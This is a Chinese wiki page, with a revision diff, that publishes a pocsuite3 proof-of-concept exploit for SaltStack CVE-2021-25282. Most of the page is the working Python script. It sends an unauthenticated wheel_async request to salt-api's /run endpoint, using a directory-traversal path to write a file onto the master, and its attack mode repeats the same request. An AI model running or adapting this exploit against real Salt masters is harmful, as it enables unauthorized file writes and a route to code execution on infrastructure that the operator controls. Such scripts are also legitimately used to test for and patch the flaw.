Difference between revisions of "Saltstack 任意文件寫入漏洞(CVE-2021-25282)"

(建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面)
 
 
Line 9: Line 9:
  
 
==POC==
 
==POC==
<code>
+
<pre>
 
#!/usr/bin/env python
 
#!/usr/bin/env python
 
# coding: utf-8
 
# coding: utf-8
Line 93: Line 93:
  
 
register_poc(TestPOC)
 
register_poc(TestPOC)
</code>
+
</pre>
 
 
 
 
  
 
==版權信息==
 
==版權信息==
 
POC由【之乎者也】提供。
 
POC由【之乎者也】提供。

Latest revision as of 21:45, 2 March 2021

這個頁面的內容缺少參考，無法保證內容的準確性。


POC

#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE    
import re
import json


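class TestPOC(POCBase):
    """pocsuite3 PoC for CVE-2021-25282 (SaltStack salt-api, < 3002.5).

    Sends an unauthenticated ``wheel_async`` request to salt-api's ``/run``
    endpoint asking ``pillar_roots.write`` to write a marker file through a
    ``../`` traversal path.  A master that accepts the job answers with a
    ``salt/wheel/<jid>`` event tag; that tag is what is checked here.

    NOTE(review): ``_verify`` is NOT side-effect free -- on a vulnerable
    master it really does write ``/tmp/vuln``.  A "success" result only
    means the async wheel job was *accepted*; whether the file write itself
    completed is never confirmed by this PoC.
    """

    vulID = '000'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-27'
    createDate = '2021-03-02'
    updateDate = '2021-03-02'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
    appName = 'SaltStack'
    appVersion = '< 3002.5'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
    '''

    def _verify(self):
        """Probe ``self.url`` for the vulnerability and return a pocsuite3 ``Output``.

        The target port is taken from the URL when given, otherwise salt-api's
        default 8000 is used.  Only the first responding port is reported.
        """
        result = {}
        pr = urlparse(self.url)
        if not pr.hostname:
            # Nothing to connect to (e.g. a bare "host:port" parses with no
            # hostname); report "not vulnerable" instead of letting the
            # request layer raise.
            return self.parse_output(result)

        # Fall back to plain HTTP when the URL carries no scheme.
        scheme = pr.scheme or 'http'
        ports = [pr.port] if pr.port else [8000]
        TIMEOUT = 10

        # Traversal out of the pillar root into /tmp; the marker file the
        # wheel call is asked to create on the master.
        path = "../../../../../../../../../tmp/vuln"
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'Content-Type': 'application/json'
        }
        # 'eauth': 'auto' with no credentials is the heart of the bug: the
        # wheel_async client is reachable without authentication.
        payload = json.dumps({
            'eauth': 'auto',
            'client': 'wheel_async',
            'fun': 'pillar_roots.write',
            'data': 'vuln_cve_2021_25282',
            'path': path,
        })

        for port in ports:
            url = '{}://{}:{}/run'.format(scheme, pr.hostname, port)
            try:
                # verify=False: salt-api is commonly deployed with a
                # self-signed certificate and this is a PoC against a host
                # under test, so TLS identity is deliberately not checked.
                r = req.post(url, headers=headers, data=payload, timeout=TIMEOUT, verify=False)
                first = json.loads(r.text)["return"][0]
                tag = first["tag"]
                jid = first["jid"]
            except (OSError, ValueError, KeyError, IndexError, TypeError):
                # OSError covers requests' RequestException (an IOError
                # subclass); ValueError is a non-JSON body; the rest mean the
                # body is not a salt-api wheel response.  In every case this
                # port is not exploitable -- try the next one.
                continue

            # A wheel job accepted by the master is tagged salt/wheel/<jid>.
            if isinstance(tag, str) and isinstance(jid, str) \
                    and "salt/wheel" in tag and jid in tag:
                result['VerifyInfo'] = {
                    'URL': url,
                    'JID': jid,
                    'UPLOAD': path,
                }
                break
        return self.parse_output(result)

    def _attack(self):
        """Attack mode is the same request: the verify step already performs the write."""
        return self._verify()

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite3 ``Output`` (success when non-empty)."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output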

# Make the PoC discoverable by the pocsuite3 runner.
register_poc(TestPOC)

版權信息

POC由【之乎者也】提供。